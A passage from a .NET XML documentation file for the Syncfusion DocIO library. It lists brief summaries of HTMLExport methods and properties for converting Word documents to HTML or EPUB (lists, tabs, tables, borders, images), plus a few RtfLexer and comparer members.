        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetNumberingsAsText(Syncfusion.DocIO.DLS.ListPatternType,System.Int32)">
            <summary>
            Get list character for Epub
            </summary>
            <param name="listFormat"></param>
            <param name="startAt"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ConvertArabicToRoman(System.Int32)">
            <summary>
            Convert Arabic to Roman
            </summary>
            <param name="arabic"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetPrefixValue(Syncfusion.DocIO.DLS.WListFormat,System.Int32)">
            <summary>
            Get Prefix value
            </summary>
            <param name="listFormat"></param>
            <param name="startAt"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteBookmark(Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Writes the bookmark.
            </summary>
            <param name="bookmarkStart">The bookmark start.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteField(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Writes the field.
            </summary>
            <param name="wField">The w field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.InsertFieldBegin(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Insert Field Begin
            </summary>
            <param name="field"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteFieldMark(Syncfusion.DocIO.DLS.WFieldMark)">
            <summary>
            Write the field mark
            </summary>
            <param name="fieldMark"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteHyperlink(Syncfusion.DocIO.DLS.Hyperlink)">
            <summary>
            Writes the hyperlink.
            </summary>
            <param name="hyperlink">The hyperlink.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Writes the image.
            </summary>
            <param name="pic">The pic.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetImageFormat(System.String)">
            <summary>
            Gets image format
            </summary>
            <param name="img"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTextRange(Syncfusion.DocIO.DLS.WTextRange,System.String)">
            <summary>
            Writes the text range.
            </summary>
            <param name="wTextRange">The w text range.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCurrentLayoutTab">
            <summary>
            Get the current layouted custom tab
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetTabStyle(System.Single,Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.Layouting.TabsLayoutInfo.LayoutTab)">
            <summary>
            Get the current tab style
            </summary>
            <param name="width"></param>
            <param name="format"></param>
            <param name="layoutTab"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetTabLeader(System.Single,Syncfusion.Layouting.TabLeader,System.Drawing.Font)">
            <summary>
            Get the current tab leader text
            </summary>
            <param name="width"></param>
            <param name="tabLeader"></param>
            <param name="font"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetTabWidth(Syncfusion.Layouting.TabsLayoutInfo.LayoutTab)">
            <summary>
            Get the current tab width
            </summary>
            <param name="layoutTab"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTabContainedText(System.String,System.String,Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Write the string which contains tab in between letter
            </summary>
            <param name="text"></param>
            <param name="style"></param>
            <param name="tr"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetSplittedText(System.String)">
            <summary>
            split the text whether it contains control character tab
            </summary>
            <param name="splittedText"></param>
            <param name="text"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTabText(Syncfusion.DocIO.DLS.WTextRange,System.String,System.String)">
            <summary>
            Write the tab text instead of "\t" with tab leader based on it width
            </summary>
            <param name="tr"></param>
            <param name="text"></param>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteListFollowText(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Write the list follow text
            </summary>
            <param name="level"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTable(Syncfusion.DocIO.DLS.WTable,System.Boolean)">
            <summary>
            Writes the table.
            </summary>
            <param name="wTable">The w table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CheckTableContainsMisalignedColumns(Syncfusion.DocIO.DLS.WTable,System.Collections.Generic.List{System.Single})">
            <summary>
            Check whether the table has misaligned cells
            </summary>
            <param name="table"></param>
            <param name="colOffsets"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteGridCell(System.Int32,Syncfusion.DocIO.DLS.PreferredWidthInfo)">
            <summary>
            Write grid before cell
            </summary>
            <param name="row"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ApplyTableGridStyle(Syncfusion.DocIO.DLS.WTable,System.Boolean)">
            <summary>
            Apply default table grid style for the table
            </summary>
            <param name="table"></param>
            <param name="isTableCreatedFromTextBox"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBottomBorderOfVerticallyMergedCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get the bottom border for the Vertically merged cell
            </summary>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetRightBorderOfHorizontallyMergedCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get the right border for horizontally merged cell
            </summary>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteOffsetsRow(System.Collections.Generic.List{System.Single})">
            <summary>
            Writes the row of offsets.
            </summary>
            <param name="offsets">The offsets.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteSpanAttributes(System.Collections.Generic.List{System.Single},System.Single,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Writes the span attributes.
            </summary>
            <param name="colOffsets">The col offsets.</param>
            <param name="rowOffset">The row offset.</param>
            <param name="cell">The cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetRowspan(Syncfusion.DocIO.DLS.WTableCell,System.Single)">
            <summary>
            Gets the rowspan.
            </summary>
            <param name="cell">The cell.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellByOffset(Syncfusion.DocIO.DLS.WTableRow,System.Single)">
            <summary>
            Gets the cell by offset.
            </summary>
            <param name="wTableRow">The w table row.</param>
            <param name="rowOffset">The row offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CalculateOffsets(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Calculates the columns.
            </summary>
            <param name="table">The table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetColspan(System.Collections.Generic.List{System.Single},System.Single,System.Single)">
            <summary>
            Gets the colspan.
            </summary>
            <param name="colOffsets">The col offsets.</param>
            <param name="rowOffset">The row offset.</param>
            <param name="p">The p.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetColspan(Syncfusion.DocIO.DLS.WTableCell,System.Collections.Generic.List{System.Single},System.Single)">
            <summary>
            Gets the colspan.
            </summary>
            <param name="cell">The cell.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteCellAttributes(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Writes the cell attributes.
            </summary>
            <param name="cell">The cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTableAttributes(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Writes the table attributes.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.IsBorderAttributeNeedToPreserve(Syncfusion.DocIO.DLS.WTable,System.String)">
            <summary>
            Check whether the border attribute need to preserve
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTableBorder(Syncfusion.DocIO.DLS.WTable,System.Text.StringBuilder)">
            <summary>
            Write table border
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetTableborder(Syncfusion.DocIO.DLS.Border,System.String,System.Text.StringBuilder)">
            <summary>
            Get table border style
            </summary>
            <param name="border"></param>
            <param name="suffix"></param>
            <param name="sb"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTableCellSpacing(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Write table cell spacing
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTableWidth(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Write table width
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTableAlignment(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Write table alignment
            </summary>
            <param name="table"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteRowAttributes(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Writes the row attributes.
            </summary>
            <param name="row">The row.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetVerAlign(Syncfusion.DocIO.ShapeVerticalAlignment)">
            <summary>
            Gets the vertical alignment.
            </summary>
            <param name="shapeAlign">The shape align.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetHorAlign(Syncfusion.DocIO.ShapeHorizontalAlignment)">
            <summary>
            Gets the horizontal alignment.
            </summary>
            <param name="shapeAlign">The shape align.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBordersStyle(Syncfusion.DocIO.DLS.TextBoxLineStyle)">
            <summary>
            Gets the border style.
            </summary>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.EnsureImagesFolder">
            <summary>
            Ensures the images folder.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetImagePath">
            <summary>
            Gets the name of the image file.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetPaddings(Syncfusion.DocIO.DLS.Paddings)">
            <summary>
            Gets the paddings.
            </summary>
            <param name="paddings">The paddings.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetPaddings(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Gets the paddings.
            </summary>
            <param name="paddings">The paddings.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellPaddingBasedOnTable(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get cell padding from table
            </summary>
            <param name="cell"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStyle(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Gets the style.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellBackground(Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Checks with Texture and returns the Background color of the cell
            </summary>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetParagraphBackground(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Gets the cell background.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetColorValue(System.Int32,System.Int32,System.Single,System.Boolean,System.Boolean)">
            <summary>
            Gets the color value.
            </summary>
            <param name="foreColorValue">The fore color value.</param>
            <param name="backColorValue">The back color value.</param>
            <param name="percent">The percent.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBordersStyle(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.Borders,System.Text.StringBuilder,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Gets the borders style.
            </summary>
            <param name="cellBorders">The cell borders.</param>
            <param name="rowBorders">The row borders.</param>
            <param name="sb">The string builder.</param>
            <param name="ownerCell">The owner cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetRowBorder(Syncfusion.DocIO.DLS.Borders,Syncfusion.DocIO.DLS.WTableCell,System.String)">
            <summary>
            Gets the row border.
            </summary>
            <param name="borders">The borders.</param>
            <param name="cell">The cell.</param>
            <param name="side">The side.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBorderStyle(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border,System.Text.StringBuilder,System.String,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Gets the border style.
            </summary>
            <param name="cellBorder">The cell border.</param>
            <param name="rowBorder">The row border.</param>
            <param name="sb">The string builder.</param>
            <param name="side">The side.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellborderStyleBasedOnTableBorder(Syncfusion.DocIO.DLS.WTableCell,System.String,System.Text.StringBuilder)">
            <summary>
            Get table border style based on table border
            </summary>
            <param name="cell"></param>
            <param name="suffix"></param>
            <param name="sb"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellBorderColorBasedOnTableBorder(Syncfusion.DocIO.DLS.WTableCell,System.String,System.Text.StringBuilder)">
            <summary>
            Get Cell border color based on table border
            </summary>
            <param name="cell"></param>
            <param name="suffix"></param>
            <param name="sb"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBorderColor(Syncfusion.DocIO.DLS.Border,System.Text.StringBuilder,System.String)">
            <summary>s
            Get border color
            </summary>
            <param name="border"></param>
            <param name="sb"></param>
            <param name="suffix"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetCellborderWidthBasedOnTableBorder(Syncfusion.DocIO.DLS.WTableCell,System.String,System.Text.StringBuilder)">
            <summary>
            Get Cell border width based on table border
            </summary>
            <param name="cell"></param>
            <param name="suffix"></param>
            <param name="sb"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetLineWidthBasedOnBorderStyle(Syncfusion.DocIO.DLS.Border)">
            <summary>
            Get line width based on border style
            </summary>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStyle(Syncfusion.DocIO.DLS.WParagraphFormat,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets the style.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ContextualSpacingChecking">
            <summary>
            check whether the paragraph contains contextualspacing property or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetParagraphFromTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Get the paragraph from table.
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStyle(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Get character format style
            </summary>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetStyle(Syncfusion.DocIO.DLS.WCharacterFormat,System.Boolean)">
            <summary>
            Get character format style
            </summary>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.SetCheckBoxSize(System.String,Syncfusion.DocIO.DLS.WCheckBox,System.Single@)">
            <summary>
            Sets the size of the checkBox.
            </summary>
            <param name="style">The style.</param>
            <param name="checkBox">The checkBox.</param>
            <param name="checkboxSize">Size of the checkBox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetColor(System.Drawing.Color)">
            <summary>
            Gets the color in Hex format
            </summary>
            <param name="color">Color</param>
            <returns>Hex value</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetScriptFontSize(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Gets the size of the script font.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBordersStyle(Syncfusion.DocIO.DLS.Borders,System.Text.StringBuilder)">
            <summary>
            Gets the borders style.
            </summary>
            <param name="borders">The borders.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetBorderStyle(System.String,Syncfusion.DocIO.DLS.Border,System.Text.StringBuilder)">
            <summary>
            Gets the border style.
            </summary>
            <param name="prefix">The prefix.</param>
            <param name="border">The border.</param>
            <param name="sb">The sb.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteBaseBdrStyle(Syncfusion.DocIO.DLS.Border,Syncfusion.DocIO.DLS.Border)">
            <summary>
            
            </summary>
            <param name="baseBorder"></param>
            <param name="border"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ToBorderStyle(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Converts border style to html border style.
            </summary>
            <param name="style">The style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ToParagraphBorderStyle(Syncfusion.DocIO.DLS.BorderStyle)">
            <summary>
            Converts border style to html border style.(For Paragraph border similar to MS Word)
            </summary>
            <param name="style">The style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.EncodeName(System.String)">
            <summary>
            Encodes the name.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CheckValidSymbols(System.String)">
            <summary>
            Checks the valid symbols.
            </summary>
            <param name="name">The name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ProcessImageForPartialTrustMode(System.String,System.Byte[])">
            <summary>
            Processes the image for partial trust mode.
            </summary>
            <param name="imgPath">The img path.</param>
            <param name="imageBytes">The image bytes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ProcessImage(System.Drawing.Image,System.String,System.Int32,System.Int32,System.Boolean,System.Drawing.Imaging.ImageFormat)">
            <summary>
            Processes the image.
            </summary>
            <param name="pic">The picture.</param>
            <param name="imgPath">The image path.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteEmptyPara(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Writes the empty paragraph.
            </summary>
            <param name="chFormat">The characterformat format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteText(System.String)">
            <summary>
            Writes the text.
            </summary>
            <param name="text">The text.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetTabText">
            <summary>
            Get tab Text of which contains 15 non breaking white space and single normal white space
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.ReplaceEmptySpace(System.String)">
            <summary>
            Replace empty space with non-breaking space
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteSpaces(System.String)">
            <summary>
            Replaces the spaces with &amp;nbsp;
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteTabSpace">
            <summary>
            Returns the Tab Space string
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetClassAttr(Syncfusion.DocIO.DLS.Style,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Returns the string with style names (according to their hierarchy)
            which are applied on paragraph.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.UpdateStyleHierarchy(Syncfusion.DocIO.DLS.Style,System.Collections.Generic.List{System.String},Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="styleName"></param>
            <param name="styleHirarchy"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.IsSpacingNeeded(Syncfusion.DocIO.DLS.WParagraphFormat,System.Boolean)">
            <summary>
            
            </summary>
            <param name="format"></param>
            <param name="spacing"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CheckParentFormat(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            
            </summary>
            <param name="format"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CloseList(System.Int32,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Close the list
            </summary>
            <param name="paraLevelNum">Paragraph level Number</param>
            /// <param name="paragraph">Paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteEndElement(System.Int32)">
            <summary>
            Write the End element
            </summary>
            <param name="levelDiff">Difference</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.WriteListType(Syncfusion.DocIO.DLS.ListPatternType,Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Writes the type of the list.
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetLevelNumer(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets the level numer.
            </summary>
            <param name="para">The list format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetLstStartVal(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Gets the list start value.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.EnsureLvlRestart(Syncfusion.DocIO.DLS.WListFormat,System.Boolean)">
            <summary>
            Ensures the level restart.
            </summary>
            <param name="format">The format.</param>
            <param name="fullRestart">if set to <c>true</c> full restart is performed.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.Build_TextureStyle(Syncfusion.DocIO.TextureStyle)">
            <summary>
            Returns the Percentage of Color for the TextureStyle
            </summary>
            <param name="ts"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetListFormat(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the list format for paragraph.
            </summary>
            <param name="para">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetOutLineLevel(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Gets the outline level 
            </summary>
            <param name="paraFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.SortBehindWrapStyleItemByZindex">
            <summary>
            Sort the document Behind Wrap Style floating items based on its Z-Index and swap the z-index values. 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CreateNavigationPoint(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Creates Navigation point
            </summary>
            <param name="para">The paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.CheckHeadingStyle(System.String)">
            <summary>
            Checks if heading style is present in the document
            </summary>
            <param name="styleName">Style name</param>
            <returns>True if the style is heading style; false otherwise</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetParagraphText(System.String)">
            <summary>
            Replaces special character
            </summary>
            <param name="text">Input text</param>
            <returns>Replaced text</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetHeadingLevel(System.String)">
            <summary>
            Returns the heading level of the style
            </summary>
            <param name="p">Style Name</param>
            <returns>Heading level</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.HTMLExport.GetNavigationPoint">
            <summary>
            Gets new navigation point id
            </summary>
            <returns>Id</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.UseAbsolutePath">
            <summary>
            Gets or sets the value indicating whether to use the absolute path.
            </summary>
            <value><b>True</b> if absolute path is specified, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.Lists">
            <summary>
            Gets the lists.
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.BehindWrapStyleFloatingItems">
            <summary>
            Gets the Behind wrap style floating items.
            </summary>
            <value>The lists.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.CurrentField">
            <summary>
            Gets the current field.
            </summary>
            <value>The current field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.PreviousField">
            <summary>
            Gets the previous field.
            </summary>
            <value>The previous field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.Footnotes">
            <summary>
            Gets the footnotes.
            </summary>
            <value>The footnotes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.FieldStack">
            <summary>
            Gets the field stack.
            </summary>
            <value>The field stack.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.Endnotes">
            <summary>
            Gets the endnotes.
            </summary>
            <value>The endnotes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.CacheFilesInternally">
            <summary>
            Gets or sets whether to cache files as stream.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.HasNavigationId">
            <summary>
            Gets or sets whether to create navigation point
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.HasOEBHeaderFooter">
            <summary>
            Gets or sets if the OEB header / footer is created
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.EmbeddedStyleSheet">
            <summary>
            Gets the stylesheets to be embedded in document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.EmbeddedImages">
            <summary>
            Gets the images to be embedded in document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.Bookmarks">
            <summary>
            Returns the bookmarks used to create TOC
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.IsParaHasTab">
            <summary>
            Get or set the value indicating the paragraph has tab
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.CurrentLineWidth">
            <summary>
            Get or set the current line width 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.DefaultTabWidth">
            <summary>
            Get or set the default tab width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.DrawingContext">
            <summary>
            Get the drawing context
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.LayoutTabList">
            <summary>
            Get or set the layouted tab list
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.HTMLExport.IsNeedToWriteTabList">
            <summary>
            Get or set the value indicating the paragraph has tab
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FloatApproxComparer.Instance">
            <summary>
            Instance of FloatApproxComparer class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.FloatApproxComparer.Compare(System.Object,System.Object)">
            <summary>
            Compares two objects and returns a value indicating whether one is less than, equal to, or greater than the other.
            </summary>
            <param name="x">The first object to compare.</param>
            <param name="y">The second object to compare.</param>
            <returns>
            Value Condition Less than zero <paramref name="x"/> is less than <paramref name="y"/>. Zero <paramref name="x"/> equals <paramref name="y"/>. Greater than zero <paramref name="x"/> is greater than <paramref name="y"/>.
            </returns>
            <exception cref="T:System.ArgumentException">Neither <paramref name="x"/> nor <paramref name="y"/> implements the <see cref="T:System.IComparable"/> interface.-or- <paramref name="x"/> and <paramref name="y"/> are of different types and neither one can handle comparisons with the other. </exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfLexer.ReadNextToken(System.String)">
            <summary>
            Reads the Next token from the stream
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfLexer.ReadControlWord(System.String,System.String)">
            <summary>
            Reads control word
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfLexer.ReadDocumentElement(System.String,System.String)">
            <summary>
            Reads Document element
            </summary>
            <param name="token"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Convertors.RtfLexer.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfLexer.IsImageBytes">
            <summary>
            Gets and Sets the imagebytes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfLexer.CommentRangeStartId">
            <summary>
            Gets and Sets CommentRange start id
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Convertors.RtfLexer.CurrRtfTableType">
            <summary>
            Gets/Sets Rtf table type
            </summary>
        </member>
